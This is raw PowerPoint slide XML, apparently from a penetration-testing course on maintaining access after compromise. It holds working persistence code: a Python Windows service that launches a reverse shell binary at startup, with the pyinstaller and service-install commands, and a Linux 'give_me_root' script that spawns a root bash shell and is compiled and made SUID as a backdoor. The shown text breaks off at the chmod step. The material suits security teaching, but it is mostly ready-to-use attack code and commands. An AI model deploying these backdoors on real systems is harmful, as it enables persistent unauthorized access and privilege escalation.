            <a:ext cx="9821776"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PATH_TO_REV_SHELL = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D16969"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D16969"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:\myscript.exe"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class</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MyService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win32serviceutil</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ServiceFramework</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svc_name</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MyService</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svc_display_name</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"My first service"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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>svc_description</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_ = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"A service that executes our reverse shell binary."</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8712629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183</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Instead of writing the time into a file, we will execute our reverse shell executable:</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7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B02AAC3-CA02-4E44-90B2-1D75806405C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1810982" y="2622885"/>
            <a:ext cx="9821776"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self</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ret_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = win32event.WaitForSingleObject(</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.hWaitStop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569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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ret_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == win32event.WAIT_OBJECT_0:</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servicemanager.LogInfoMsg</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"Service is stopping"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break</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subprocess.call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(PATH_TO_REV_SHELL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</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F8D1388A-3DA4-44A0-8D66-E5875F822882}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948278" y="5475258"/>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The rest of the service code is the same.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176863492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184</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compile it as previously done:</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10" name="TextBox 9" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6081E623-64D5-47A2-9430-183DFA120D33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859110" y="2637578"/>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accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pyinstaller.exe --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hiddenimport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> win32timezone --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --icon NONE .\my_service.py</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA51E2C1-8DA4-472E-9F79-594BC4A591EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948277" y="3271853"/>
            <a:ext cx="10413543" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next, we will run the output executable and install the service and run it.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Note that we need to make sure that our reverse shell is placed at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>PATH_TO_REV_SHELL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>C:\myscript.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) before starting the service.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44C40885-2F07-4641-A176-4E6BDAFA37B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859110" y="4644791"/>
            <a:ext cx="982177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accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.\my_service.exe --startup auto install</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.\my_service.exe start</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{849892F9-94DF-48CF-978A-15C21A7F6DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948277" y="5248288"/>
            <a:ext cx="10886786" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notice that we’re adding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>--startup auto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which will run the service on the system startup.</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This means the service is going to start at the system’s startup.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37539476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185</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we start the service, we will receive a nice reverse shell 😃!</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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Graphical user interface, text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97AB6947-6AD8-47D0-8DC6-C1BEA3CCD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159" y="2554706"/>
            <a:ext cx="7084094" cy="4235742"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15B07A32-CB81-4879-B625-D09717C741FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948277" y="2791467"/>
            <a:ext cx="2731882" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that since we have set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>startup mode to auto, the reverse shell will run every 60 seconds, and this applies even if the Windows system gets restarted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304658036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186</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948278" y="2133271"/>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To stop the service and remove it</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Windows (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EAA753C-63F9-4848-B068-A782B2D0E803}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1690669" y="2661138"/>
            <a:ext cx="982177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accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.\my_service.exe stop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Stopping service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MyService</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="85000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.\my_service.exe remove</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Removing service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MyService</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="85000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Service removed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6069294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187</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889228" y="1883440"/>
            <a:ext cx="10413543" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assuming that we have obtained root privileges, there are several ways to maintain the access on a Linux-based system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this section will discuss creating a vulnerable ELF file.</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First, we will write a simple Python script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>give_me_root.py</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Linux-based systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE5D857C-6E26-4DFD-9231-AC0A6107F892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1770879" y="3527412"/>
            <a:ext cx="982177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os</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setuid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setgid</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pty</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spawn</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setuid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setgid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spawn(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/bin/bash"</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22269042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188</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889228" y="1883440"/>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Once created, we will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pyinstaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to compile our Python script into an ELF file.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"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Linux-based systems (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE5D857C-6E26-4DFD-9231-AC0A6107F892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766868" y="2580928"/>
            <a:ext cx="982177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root@server1:/test# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pip3.10 install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pyinstaller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>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root@server1:/test# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pyinstaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>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onefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> give_me_root.py</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root@server1:/test# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>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dist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>give_me_root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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rwxr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xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x 1 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 7.1M Dec 14 20:07 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dist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give_me_root</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F586CE7D-C46A-4F2E-ACFC-456A4FC81049}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889228" y="4109413"/>
            <a:ext cx="9602309"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 will give the output file the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>“Set User ID” (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>SUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> permission:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6A53DDC-3AA2-4C8E-A80C-166E2115A42A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766868" y="4619601"/>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root@server1:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
